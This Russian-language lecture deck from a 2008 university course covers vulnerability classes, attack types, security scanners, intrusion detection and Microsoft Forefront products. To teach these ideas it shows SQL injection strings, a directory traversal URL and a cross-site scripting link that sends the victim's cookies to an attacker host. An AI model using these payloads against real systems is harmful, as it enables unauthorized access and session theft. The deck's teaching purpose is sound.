Upload
stone-caldwell
View
40
Download
5
Embed Size (px)
DESCRIPTION
Лекция 16 . Анализ защищённости информационной системы на основе выявления уязвимостей и обнаружения вторжений. Технологии и продукты Microsoft в обеспечении ИБ. Цели. striDe. Изучить классификацию уязвимостей, информационных атак и их возможных последствий. - PowerPoint PPT Presentation
Citation preview
Технологии и продукты Microsoft в обеспечении ИБ Лекция 16. Анализ защищённости информационной системы на
основе выявления уязвимостей и обнаружения вторжений
2 Высшая школа экономики - 2008
Цели
Изучить классификацию уязвимостей, информационных атак и их возможных последствий.
Рассмотреть различные типы технологических и эксплуатационных уязвимостей программно-аппаратного обеспечения АС.
Изучить основные способы реализации информационных атак.
Научиться отличать сетевые и хостовые системы анализа защищённости.
Познакомиться с методами сбора и анализа информации, реализуемые в системах анализа защищённости.
3 Высшая школа экономики - 2008
Уязвимость - «ахиллесова пята» информационных систем
4 Высшая школа экономики - 2008
От чего защищать?
5 Высшая школа экономики - 2008
Типы уязвимостей
Технологические уязвимости Уязвимость типа «переполнение буфера» Уязвимость типа «SQL Injection» Уязвимость типа «format string»
Эксплуатационные уязвимости Неправильная настройка сетевых сервисов АС Использование слабых и нестойких к угадыванию
паролей доступа Отсутствие установленных модулей обновления
программного обеспечения (Service Packs, HotFixes, и т.д.)
6 Высшая школа экономики - 2008
Классификация уязвимостей АС
Уязвимости автоматизированных систем
Уязвимость аппаратногообеспечения
По типу обеспечения АС, в котором содержится уязвимость
Уязвимость общесистемного программного обеспечения
Уязвимость прикладного программного обеспечения
Уязвимостьтехнологического этапа
По этапу жизненного цикла АС, на котором внедряется уязвимость
Уязвимость эксплуатационного этапа
По типу уязвимости
Уязвимость в программно-аппаратном обеспечении АС
Уязвимость в организационно-правовом обеспечении АС
Уязвимости, внесённые преднамеренным путём
По степени преднамеренности внесённой уязвимости АС
Уязвимости, внесённые непреднамеренным путём
Уязвимость рабочих станций АС
По типу компонента АС, в котором содержатся уязвимость
Уязвимость серверов АС
Уязвимость коммуникационного оборудования и каналов связи АС
Уязвимость сетевого уровня
Уязвимость при-кладного уровня
Уязвимостьфизического уровня
Уязвимость канального уровня
По уровню модели сетевого взаимодействия, на котором присутствует уязвимость
Уязвимость транс-портного уровня
7 Высшая школа экономики - 2008
Технологическая уязвимость типа«переполнение буфера»
8 Высшая школа экономики - 2008
Источники уязвимостей типа «buffer overflow»
программы, которые запускаются локально на хосте
сетевые приложения, которые обеспечивают интерактивное взаимодействие с пользователем на основе сетевых протоколов. Примером сетевых программ являются Web-приложения, такие как CGI-модули, PHP-сценарии, активные серверные страницы ASP и др.
хранимые процедуры серверов СУБД
9 Высшая школа экономики - 2008
Технологическая уязвимость «SQL Injection»
Уязвимости типа «SQL Injection» («инъекция в SQL-запросы») позволяют нарушителю выполнять несанкционированные операции над содержимым баз данных SQL-серверов путём вставки дополнительных команд в SQL-запросы
Уязвимость «SQL Injection» заключается в отсутствии проверки корректности данных, поступающих на вход программе, что потенциально может позволить нарушителю составить входные данные таким образом, что приведёт к искажению искомого SQL-запроса к СУБД
10 Высшая школа экономики - 2008
Активизация уязвимости «SQL Injection» с целью получения НСД
SQLQuery = "SELECT Username FROM Users WHERE Username = '" &
strUsername & "' AND Password = '" & strPassword & "'"
strAuthCheck = GetQueryResult(SQLQuery)
If strAuthCheck = "" Then
boolAuthenticated = False
Else
boolAuthenticated = True
End If
«SELECT Username FROM Users WHERE Username = '' OR ''='' AND Password = '' OR ''=''»
(полужирным шрифтом выделены команды, которые внедряются нарушителем в исходный SQL-запрос).
11 Высшая школа экономики - 2008
Активизация уязвимости «SQL Injection» с целью извлечения данных
SQLString = "SELECT FirstName, LastName FROM Employees WHERE City = '" & strCity & "'«
SELECT FirstName, LastName FROM Employees WHERE City =
'' UNION ALL SELECT OtherField FROM OtherTable WHERE ''=''
12 Высшая школа экономики - 2008
Технологическая уязвимость «Directory traversal»
Уязвимости типа «Directory traversal» («просмотр директорий») могут позволить злоумышленнику получить несанкционированный доступ к файловым ресурсам сервера в обход установленных правил разграничения доступа
«http://192.168.0.1/getnews.asp?item= ../../../../WINNT/win.ini»
13 Высшая школа экономики - 2008
Технологическая уязвимость «Cross Site Scripting»
Уязвимости типа «Cross Site Scripting» («межсайтовое выполнение сценариев») характерны для серверных Web-приложений, не предусматривающих проверку синтаксиса входных данных, на основе которых формируются HTML-документы, отправляемые пользователям
«<A HREF="http:// www.server.ru/ShowError.asp? error_text= <script>document.location. replace('http://hacker.org/steal.cgi?+document.cookie');</script>">Link Text </A>»
14 Высшая школа экономики - 2008
Уязвимости реализаций стека TCP/IP
Уязвимости реализаций стека TCP/IP связаны с ошибками, которые допускаются программистами на этапе реализации программных модулей, отвечающих за обработку входящих и исходящих пакетов данных
Пример уязвимости данного типа – атака «Land»
хостхост
15 Высшая школа экономики - 2008
Жизненный цикл атаки
16 Высшая школа экономики - 2008
Типы информационных атак
17 Высшая школа экономики - 2008
Инструментальный анализ защищенности
Для чего предназначен:• Инвентаризация ресурсов сети (устройства, ОС, службы, ПО)• Идентификация и анализ технологических уязвимостей• Подготовка отчетов, описание проблем и методов
устранения
Типы используемых для анализа средств:• Сетевые сканеры безопасности • Хостовые сканеры безопасности (проверка ОС и
приложений) • Утилиты удаленного администрирования • Утилиты для верификации найденных уязвимостей • Утилиты для инвентаризации ресурсов
18 Высшая школа экономики - 2008
Сбор информации
Сетевые датчики предназначены для сбора информации о пакетах данных, передаваемых в том сегменте ИС, где установлен датчик
Хостовые датчики устанавливаются на определённые компьютеры в ИС и предназначаются для сбора информации о событиях, возникающих на этих компьютерах
19 Высшая школа экономики - 2008
Анализ информации
Сигнатурные методы описывают каждую атаку в виде специальной модели или сигнатуры. В качестве сигнатуры атаки могут выступать: строка символов семантическое выражение на специальном языке формальная математическая модель и т.д.
Поведенческие методы отслеживают несоответствия между текущим режимом функционирования ИС и моделью штатного режима работы, заложенной в параметрах метода
20 Высшая школа экономики - 2008
Защита периметраЗащита периметраЗащита серверных Защита серверных приложенийприложений
Защита клиентской Защита клиентской и серверной ОСи серверной ОС
Всесторонняя защита бизнес-приложений, позволяющая достичь лучшей защиты и безопасного доступа посредством глубокой интеграции и упрощенного управления
Microsoft Forefront
21 Высшая школа экономики - 2008
Forefront Network Inspection System (NIS) Сигнатуры, основанные на уязвимостях Основана на GAPA от Microsoft Research
• Generic Application Level Protocol Analyzer
Платформа для быстрого низкоуровневого сканирования
Расширяема
Security assessment and response (SAS) Моделирование, основанное на поведении
Система предотвращения вторжений
22 Высшая школа экономики - 2008
Основанная на сигнатурах Определяет и противостоит атакам из интернета,
основанным на уязвимостях Определяет и предупреждает о «внутренних»
компьютерах, которые ведут атаки Основанная на анализе поведения
«Найди то, не знаю что» Отслеживает поведение систем и определяет
потенциально зловредные компоненты сети Может противодействовать угрозе на основании
политики
Система предотвращения вторжений
23 Высшая школа экономики - 2008
Использованные источники
Сердюк В.А. Уязвимость - «Ахиллесова пята» современных информационных систем «BYTE/Россия», 2004, №4 (68), стр. 19-22.
Сердюк В.А. Вы атакованы – защищайтесь (методология выявления атак) // «BYTE/Россия», 2003, №9 (61), стр. 61-64
Сердюк В.А. Новое в защите от взлома корпоративных систем. Техносфера; 2007.
Калихман Р. Forefront Client Security: технический обзор // Microsoft, слайды. Опубликовано: https://msdb.ru/Downloads/f/d5214ed0-b831-4e27-b85c-ad61a700ea45/1_FCS_overview.pdf
Спасибо за внимание!